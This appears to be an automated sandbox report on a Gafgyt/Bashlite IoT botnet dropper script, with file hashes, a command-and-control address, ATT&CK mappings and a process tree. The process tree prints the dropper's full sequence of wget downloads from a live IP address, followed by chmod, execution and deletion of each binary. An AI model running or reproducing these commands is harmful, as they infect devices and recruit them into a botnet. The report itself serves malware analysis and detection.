gafgyt | 36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454

Analysis

max time kernel
12s
max time network
16s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11-12-2024 02:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
Size

2KB
MD5

281cd1f53a61fc59ed834b72363fed74
SHA1

7f893a0bbd0331405e0dbee4a69a63faf92911a4
SHA256

36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454
SHA512

622edede06210a694a16db2a1863baec85fd23d31630b9ebf1fab4efbb682f154decbf688c403ea4a187ba6a3d6e61a3ae5045dff8930763b25eb184408f6bcb

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

93.123.85.251:12345

Signatures

Detected Gafgyt variant 8 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
724	chmod
731	chmod
677	chmod
690	chmod
700	chmod
707	chmod
713	chmod
719	chmod

Executes dropped EXE 8 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	679	m-i.p-s.Sakura
/tmp/m-p.s-l.Sakura	691	m-p.s-l.Sakura
/tmp/s-h.4-.Sakura	702	s-h.4-.Sakura
/tmp/x-8.6-.Sakura	709	x-8.6-.Sakura
/tmp/a-r.m-6.Sakura	714	a-r.m-6.Sakura
/tmp/x-3.2-.Sakura	720	x-3.2-.Sakura
/tmp/a-r.m-7.Sakura	725	a-r.m-7.Sakura
/tmp/p-p.c-.Sakura	732	p-p.c-.Sakura

Reads system routing table 1 TTPs 2 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget

/tmp/36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
/tmp/36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
1⤵
PID:661
- /usr/bin/wget
  wget http://93.123.85.251/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:669
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:677
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  - Executes dropped EXE
  PID:679
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:682
- /usr/bin/wget
  wget http://93.123.85.251/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:685
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:690
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  - Executes dropped EXE
  PID:691
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:695
- /usr/bin/wget
  wget http://93.123.85.251/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:696
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  - Executes dropped EXE
  PID:702
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:704
- /usr/bin/wget
  wget http://93.123.85.251/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:705
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:707
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  - Executes dropped EXE
  PID:709
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:711
- /usr/bin/wget
  wget http://93.123.85.251/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:712
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:713
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:714
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:717
- /usr/bin/wget
  wget http://93.123.85.251/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:718
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:719
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  - Executes dropped EXE
  PID:720
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:722
- /usr/bin/wget
  wget http://93.123.85.251/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:723
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  - Executes dropped EXE
  PID:725
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:727
- /usr/bin/wget
  wget http://93.123.85.251/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:728
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:732
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:735
- /usr/bin/wget
  wget http://93.123.85.251/i-5.8-6.Sakura
  2⤵
  PID:736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
02edcf81f90fa0073933ff444cf9c551

SHA1
948e1b1e5f9d7bd281c6e7bab0afece688996461

SHA256
98e7a67e16f8ce69c4f3601e484e3325491a4a2fa56bebe321621850e8774a24

SHA512
9178b1b5573b77a3e097b844a6ef5e41144ab1ebe83c311230d2cfcde7d9c84dac7e0225a4b78ff324027e86520889af2578cbb0dba8f9b13f7191ec274b118a

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
7d8a00b361f81daf7c2777262e112c05

SHA1
3fb65dab04dbe9ba6fadbc58e3944018a6a9e153

SHA256
7dac9097a25a98ae0c4a744f76b9a88a7fed4b18836b4185a03cb99c8ff3c2d7

SHA512
98198bd221b453892e4e7829ea2c7e996643b623718ed9263610267669d5aa6abc2febe6fdfc1327a4a98dd094f1dd396c8567897437525fba4acdb89e6a4e4c

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
bb80b6c414e11d03d63ffdbf7b47aa76

SHA1
e688615f95d5809c4588e19ade9eb0bd43bbad93

SHA256
d2eb9394cb5b769124b55695df67009d2ceea9367aa9b8d69ec7bd921d8e151f

SHA512
5d09788e662b8841b90c3c33bdd9ef70cb759e8b9bd8e1e9a86fa7b39327ccb7c558502d914016a46e1566c74e3c224e51965a83d79746fbf13a86b51ab6a069

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
397bcfb06013b5359f9e344b30f9a961

SHA1
2c531fb14397438f68dea2ad02c769b0270b9f47

SHA256
6ac57203130207f6d1b33fd710356dbe5dd56fee6ddebe607a8dc3ee152bccfb

SHA512
3c72765117c9be73f67d9b539d6e1fc7e1a4e0a89fd876bdcb43fa23da7a47f02ac544c7ea6abb2cef0fec50a2a6dedee4e4c46d371d0fd6d3a1c6b3b9ce381c

Download Submit
/tmp/p-p.c-.Sakura

Filesize
105KB

MD5
31f1e73d6d69bd7048efc723ba68dc43

SHA1
27ea7191b90d04baaf87af1b0ec2dda464702fac

SHA256
ea4b669059899755ae9661c63f39505f62cf6e31509126bfa897fc24d35cd347

SHA512
eae2def2f13ba9684e8be10751a9d23b02ab8389981832807143e045cf81740a8e38c3b53ead1efd7fcafab7b194c605915b2ffa1d9ec766681286e9ead905f3

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
59087681140ec73425248bbd2e35553a

SHA1
cc89aa88bd6e02c6a34c532f711c1e8f6ee681e9

SHA256
7cf457f6e3a54354c75ed474f6712b08e8abf3f697cc8c08d578721a265a7deb

SHA512
bccc9a8974e9e1d93d99c78ce57005ff78784b7fb65855f2acc97c5c81e2361f4801cb621fcdd5ac656ef294b8642085484be64c4feadfc9c664af4d4f4b6b82

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
0edc673eda0ed6fc89b1a1dc8de894be

SHA1
d3cf741bb069718950040b4b74317de61b4b66ad

SHA256
7a6489e4a5b25915b47b204aecc3afb0e3f51f6f33059e8333b8e0300b4ca2a1

SHA512
342d06111a490d97e4f2926b6b35d989993bc12e9709d736bae4ce317f24fad0b3800cee7e13a3ee788096ac3fcaee1e041ad6fe9769c9232794da2eb2eeef03

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
7981a3a60ab91469df013ca383906bd9

SHA1
dcbcd34f841284a0f7f52c5a0e17d44c059d5b96

SHA256
e03adb20dced14f894c81f977f244215ed95d821ee8d3462edd2c29e40589d27

SHA512
51956996c5d19a3c6c932dfb8a8c4dac0153d7601e80509dc31d1b843f37eaeb999ea72678140e2e7a2a64ade667ab7700c65eb0771400e80302e9ef25b0483c

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads